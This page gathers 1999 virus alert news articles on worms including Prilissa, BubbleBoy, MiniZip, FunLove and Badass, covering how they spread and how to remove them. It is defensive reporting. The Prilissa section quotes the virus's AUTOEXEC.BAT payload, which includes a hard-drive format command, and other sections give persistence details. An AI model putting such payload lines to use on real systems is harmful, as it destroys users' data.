Will W95.Babylonia Harm My Computer? So far, it is not clear whether W95.Babylonia contains a malicious "payload" -- that is, it has not been reported to intentionally delete or scribble files on an infected computer. However, it is possible that a "time bomb" hidden in the program could do such things later. Also, any program which modifies executable files has the potential to corrupt them and may also hurt system performance. Most disturbingly, as explained below, the program may be altered remotely at a later date to be more harmful. The version of W95.Babylonia which is now circulating on the Net causes infected computers to display a message at boot time. The message reads: W95/Babylonia by Vecna (c) 1999 Greetz to RoadKil and VirusBuster Big thankz to sok4ever webmaster Abracos pra galera brazuca!!! --- Eu boto fogo na Babilonia! The virus also attempts to send e-mail to the address [email protected]. However, users should not be complacent about these relatively harmless side effects. According to Symantec, W95.Babylonia contains an "interesting" feature: when the program installs itself, some parts of it are downloaded automatically from a Web server in Japan. The virus waits for the computer to connect to the Internet, then downloads these additional components. This "automatic update" capability could be used to add more destructive features to W95.Babylonia when you connect to the Internet at a later date.

Back to the top


   Mypics.Worm Strikes

December 3, 1999
Anti-virus companies are scrambling to fix a potentially malicious worm masquerading as a Y2K glitch that packs a double-punch.
The W32/Mypics.worm comes in an e-mail without a subject line and contains a message that reads "Here's some pictures for you!" At first, the worm acts like Melissa, immediately sending itself to as many as 50 listings in a user's Outlook address book. The mass-mailing will not be triggered if the virus recipient doesn't use Outlook.
But the e-mail also contains an executable attachment, labeled Pics4You.exe, which infects the user's PC with the worm if it is opened. Once opened, on Jan. 1, 2000, the worm also overwrites part of the hard drive of the infected PC. If that PC is rebooted anytime after the New Year, the worm has the potential to completely reformat the hard drive, causing a loss of data. The glitch will try to disguise itself as a Y2K problem.
The worm also changes the home page of Internet Explorer users to a Geocities Web page containing a visitor counter and the words "Dave's Web Page: Brought to You By the Cave!" The site also contains a link to adult content.
5,000 visitors to Dave's Web Page
It's unclear whether the creator of Web page is related to the worm's distribution or creation, according to anti-virus researchers. As of Thursday night, the site had logged more than 3,000 visitors. That number had increased to more than 5,000 Friday morning. Some of those hits may come from people affected by Mypics, but others could be from people who've heard about the worm and are merely curious.
Researchers at Symantec Corp.'s AntiVirus Research Center said they will have new software to combat the worm on their site sometime Friday. Marian Merrit, a group product manager for Symantec's Norton AntiVirus software, said researchers had rated the worm a medium risk.
"We didn't want people to run around and get hysterical," she said. However, she said MyPics could be upgraded to a higher risk category as the company gets more reports of it. Merritt also called MyPics the "scariest" Y2K-related worm or virus she's seen so far.
In recent months, researchers have discovered several other viruses created to take advantage of the date change. Trojan.polyglot was sent out in September, purporting to be a Microsoft Corp. e-mail touting a Y2K fix. If a person installed the virus, it could steal information from their computer. However, there have been few reports of it.
But people have seen worm.fix200, which comes with an e-mail containing the subject line "Internet problem year 2000" and a message in Spanish urging people to update their Y2K software. An attachment in the e-mail could overwrite a user's hard drive.
Still, Carey Nachenberg, Chief Researcher at Symantec's AntiVirus Research Center, said he hasn't seen as many Y2K-inspired viruses and worms as he expected. "There's been very little activity," he said. "People have been very calm."


Back to the top


   MiniZip Virus
December 1, 1999
They call it, MiniZip.
Virus researchers at Network Associates Inc. and Symantec Corp. warned Tuesday evening that a new version of the ExploreZip virus, which wipes out information on a hard drive, has hit at least 12 companies so far, six of them high-tech manufacturing companies. Several thousand PCs are believed to have been hit.
The ExploreZip variant, also called ExploreZip.worm.pak, is 120 KB, about half the size of its predecessor. But other than its diminutive size, MiniZip acts exactly like ExploreZip, which both wipes out files on hard drives and can spread via e-mail. For instructions on how to protect your PC against the virus, see our original coverage Inside the Worm.ExploreZip Virus.
Compression conundrum
MiniZip is so small because the virus's author compressed the original ExploreZip code. Compressing it changes the bits, meaning that anti-virus software has trouble identifying the new virus. MiniZip first appeared last week, so most anti-virus makers have updated their software to detect its code. While anti-virus makers issued notice of the new updates, it appears that many companies have not updated their antivirus software, allowing Tuesday's outbreak.

What To Look For ExploreZip, the "father" of MiniZip, was first reported on June 11. The worm uses MAPI-capable e-mail programs to propagate, such as Microsoft Corp.'s Outlook, Outlook Express and Exchange. It e-mails itself out as an attachment with the filename "zipped_files.exe." The body of the e-mail message looks like it came from a regular e-mail correspondent and says: "I received your email and I shall send you a reply ASAP. Till then, take a look at the attached zipped docs." Once it's launched, MiniZip launches the original Worm.ExploreZip routine. It looks for any drives mapped to the infected computer and spreads to them. It also looks for unread e-mail and automatically replies to them, in search of new victims. "That's why it has spread so rapidly now, but didn't at first," said Vincent Weafer, director of the Symantec Antivirus Research Center. "This is exactly how ExploreZip spread." MiniZip may display an error message informing the user that the file is not a valid archive, according to the antivirus companies. The worm copies itself to the c:\windows\system directory with the file name "Explore.exe" and then modifies the WIN.INI file so that the virus launches each time Windows is started. For the latest bug alerts and anti-virus tools, please check the Help & How-To Bugs Guide.

Back to the top


   Prilissa Virus
November 22, 1999
It's called the W97M/Prilissa virus. But a better name for it would be the Grinch virus.
Anti-virus researchers at Network Associates Inc. said Friday that 10 Fortune 500 companies on three continents have been hit with a new virus called W97/Prilissa. Prilissa is a nasty variant on two better known attacks -- the Melissa worm and the PRI virus. The virus depends on the Windows 95 and 98 operating systems and the Word 97 word processing application.
If opened, it will e-mail itself to the first 50 names on a computer's Outlook or Outlook Express e-mail client.
"This is probably the fastest infection rate we've seen since Melissa," said Sal Viveros, antivirus product manager at Network Associates, in Santa Clara, Calif. The virus uses macro commands similar to those of Melissa to replicate itself.
But the virus itself won't go off until Christmas day. That means it won't have much of an impact on companies, which aren't likely to be open on that day, even if it should go undetected. But there is a big threat to home PC users, particularly unsuspecting children logging onto the computer to play with their new games on Christmas.
The Dr. Suess analogies are endless.

What It Does

The virus itself looks for a registry key to verify if the local system has been infected. If it hasn't, the virus creates a Microsoft Outlook e-mail message with the subject line "Message From (Office 97 user name)" and a message body that says "This document is very Important and you've GOT to read this!!!"
The first 50 listings from all address books are selected, along with an attachment -– the infected document, whatever it is.
If the date is December 25, the virus runs a destructive payload to overwrite the existing C:/AUTOEXEC.BAT file with the instructions:
"@echo off"
"@echo Vine...Vide...Vice...Moslem Power Never End..."
"@echo Your Computer Have Just Been Terminated By -= CyberNET-= Virus !!!"
"ctty nul"
"Formate c:/autotest/q /u"
The virus will not run on Windows NT. Another message is displayed on Word 97, adding:
"You Dare Rise Against Me... The Human Era is Over, The CyberNET Era Has Come!!!"
Most antivirus vendors are expected to have a definition update and fix prepared within the next few hours.
It's unclear who will carve the roast beast.


Back to the top


   FunLove Virus Warning
November 11, 1999
There's nothing tender about the new FunLove virus. The virus, technically called W32.FunLove, brought down the servers of a large company in Europe and has been detected in companies in the U.S., as well, according to researchers at Symantec Corp's AntiVirus Research Center.
The good news is that it shouldn't spread all that fast because it doesn't have the ability to e-mail itself like the Melissa virus, said Charles Renert, director of research at SARC. The bad news is that it uses a new way to attack the file security system of the Windows NT operating system. The virus may also use the network to spread itself.
"It's a little bit of an evolution as far as virus writing is concerned," said Renert.

How It Works The virus appears as an executable file running on all flavors of Windows, from Windows 95 on up. The only way to recognize that a machine has been infected is by finding the fclss.exe file the virus drops into the Windows System directory. In turn, it infects applications with EXE, SCR or OCX extensions. The real goal of the virus is to attack the Windows NT file security system. In order for the virus to attack, it needs administrative rights on an NT server or workstation. Once an administrator logs on to NT, the virus modifies the NT kernel so that every user has administrative rights to that machine, regardless of the protection. This means that a "guest" -- someone with the lowest possible rights on the system -- would be able to read and modify all files, including files normally accessible only by the administrator. Symantec officials said they have added virus definitions to recognize FunLove and should have a tool available shortly to help repair an infected machine at www.symantec.com/avcenter/download.html. Earlier this week, researchers issued warnings about the so-called BubbleBoy virus -- actually a self-replicating worm -- that can spread itself through Microsoft Corp.'s Outlook and Outlook Express software.

Back to the top


  Bubbleboy Worm Alert!
November 9, 1999
Prepare to unlearn everything you've learned about computer viruses.
An anonymous virus writer who is apparently an avid "Seinfeld" fan has created a virus -- actually a self-replicating worm -- that can spread itself through a user's Microsoft Outlook or Outlook Express client.
The worm, called "BubbleBoy" in an apparent reference to a "Seinfeld" episode, is unlike anything that anti-virus software vendors have seen to this point.
It doesn't rely on an attachment. Instead, all a user has to do is open an e-mail. An embedded Visual Basic Script command attaches itself to the Outlook address book and mails the e-mail to everyone in the address list.
"Historically, anti-virus vendors have always told users, 'If you don't open the attachment, you won't have a problem,' " said Sal Viveros, marketing manager for Total Virus Defense at Network Associates Inc. in Santa Clara, Calif. "This changes that."
For Outlook Express users, it's particularly troubling. Simply using the preview function of Outlook Express will allow the worm to replicate.

New Breed, But Low Risk Still, BubbleBoy is considered low risk by most anti-virus software vendors, including Network Associates, Symantec Corp., Computer Associates International Inc. and Trend Micro Corp., because it hasn't been reported by any customers. Besides being a nuisance, it doesn't carry with it any code that could damage someone's computer. Someone thought to be the virus writer, most likely in an effort to gain attention, sent BubbleBoy to anti-virus companies and posted it on several Web sites Monday night. Anti-virus vendors worry that this could be a harbinger of some very nasty things to come. Last month, researchers at the Virus Bulletin conference in Vancouver speculated that something like BubbleBoy could be created. And just a few days ago, a posting on several security sites explained how it could be done, said Dan Schrader, vice president of new technology at Trend Micro in Cupertino, Calif. It wouldn't be difficult, Schrader said, for virus writers to release something like BubbleBoy into the wild and attach a malicious payload to the VBS program. "It's interesting. And it's scary. And it's quite powerful," he said. But, Schrader added, it isn't in the wild quite yet, and most anti-virus vendors should have it added to their virus definition lists by the end of the day.

Patching For Protection

Who's Affected?
BubbleBoy requires Internet Explorer 5.0 with Windows Scripting Host installed, which is standard on Windows 98 and Windows 2000. It doesn't run on Windows NT or on the default settings of Windows 95. Setting IE 5.0 to its maximum security setting would prevent it from doing anything.
Users won't know they have been infected until the initial e-mail blast. After that, the worm changes the registered owner to BubbleBoy and the organization to "Vandelay Industries."
The body of the message simply says, "The BubbleBoy incident, pictures and sounds."
Vandelay Industries, like the BubbleBoy whose bubble burst during a tense game of Trivial Pursuit, was a long-running joke on "Seinfeld." George, Jerry's often-unemployed sidekick, was fond of saying he worked for the fictitious Vandelay Industries.
The BubbleBoy worm may be taking advantage of a Microsoft security hole for which there is a patch.
Symantec anti-virus researchers in Santa Monica, Calif., are trying to determine if BubbleBoy is taking advantage of an IE 5.0 security flaw discovered in August.
Patch That App
In a security bulletin dated August 31, Microsoft posted a patch that eliminates the security vulnerabilities in two Active X controls of IE 5.0.
The net effect of the vulnerabilities, according to Microsoft, was that a Web page could take control of a user's computer without the user knowing it. Grab the update to patch IE 5.0.
Researchers add that BubbleBoy is further proof that, as anti-virus technology improves, virus writers are getting smarter, particularly when it comes to VBS.
"BubbleBoy in of itself is not very dangerous," said Narender Mangalam, director of security products at Computer Associates in Islandia, N.Y. "The reason we are all very interested in this is because it is a proof of concept."


Back to the top


   Badass Virus Infects Outlook

One of two new e-mail-based worm viruses, Badass, has begun spreading across the Internet. The virus, which originated in Holland, does not damage files, but does create large volumes of e-mail traffic and could cause network slowdowns. Fortunately, Badass' bark is far worse than its bite, and the cure is relatively simple. Virus experts have deduced that this worm which likely originated in a bank in the Netherlands is a rather inelegant kluge of the codes of the Melissa and Win.Stupid virii.
A worm is so named because it roots into your system and then makes copies of itself, in effect, perpetuating its existence. Internet worms are particularly pernicious, because they use a host computer to make copies, and then take advantage of the host computers Internet connection to send copies of themselves to other computers.

What Badass Looks Like

Like all e-mail-based viruses, Badass exists as an attachment to an e-mail message and will not execute unless you open the attached file. That's good. Prudent computing dictates that you should never open an unknown file, or a file from an unknown user. It's important to bear in mind that e-mail viruses cannot execute unless you open the attached file.
In the case of Badass, the particular e-mail message, 24,576 bytes in size, comes with two possible subject lines, both: =?Windows-1252?B?TW9n+2guLg==?=, and a variation which starts with the characters "Moguh…" have been reported. The body of the message reads, in Dutch, ""Dit is wel grappig! :-),"which translates into, "This is funny! :-)." It's the attachment, however, BADASS.EXE that does the damage. When you open this file, either by double-clicking on the icon in the mail message, or by right-clicking on the attachment icon in your e-mail program and selecting open, the program launches

What Badass Does

The first thing you'll see is a dialog box with a particularly juvenile and vulgar message, "An error has occurred because your ___ smells bad." The code of the virus is programmed so that you cannot click the No button-a rip-off of Win.Stupid code. When you click yes, you're informed, "Contact your local supermarket for toilet paper and soap to solve this problem."
From here on out, it's pretty much all Melissa. The virus spreads out over your hard drive looking for Microsoft Outlook. If you don't have Microsoft Outlook, nothing will happen; if Outlook is installed, however, Badass will recreate its message, and attach a copy of BADASS.EXE to that message, and then send that message to everyone in your address book. Badass also adds a registry key: HK\Current User\SoftWare\VB and VBA Program Settings\Windows\CurrentVersion with the value "CMCTL32"="00 00 00 01"
One caveat - it is not known if Badass is capable of working it's pernicious sleight-of-hand without the aforementioned subject line, message contents, and file name. In other words, it is possible that someone could rename the virus and change the message and subject and continue the worm's spread

Prevention and Cure

Prevention and cure are quite simple. Don't open unknown files, or files from unknown persons. Use virus-scanning software that is capable of checking e-mail attachments, such as, McAfee's VirusScan, or Symantec's Norton AntiVirus-Norton has released an update to deal with Badass.
If you get the Badass email, don't just delete the message. Make sure that you use Windows' Explorer to go to the directory where your e-mail program stores attachments and delete the file BADASS.EXE. If you're not sure what directory your e-mail program uses, press F2 in the Windows Explorer, and type BADASS.EXE in the file name box. Be sure to search all your hard drives. If you don't find the files, your e-mail program deleted the attachment when you deleted the message. After doing all this, be certain to empty the deleted items folder in both your e-mail program and on the Windows Desktop

Home

Mac

Linux

Windows9x

Windows Me

Download Center

Virus Alerts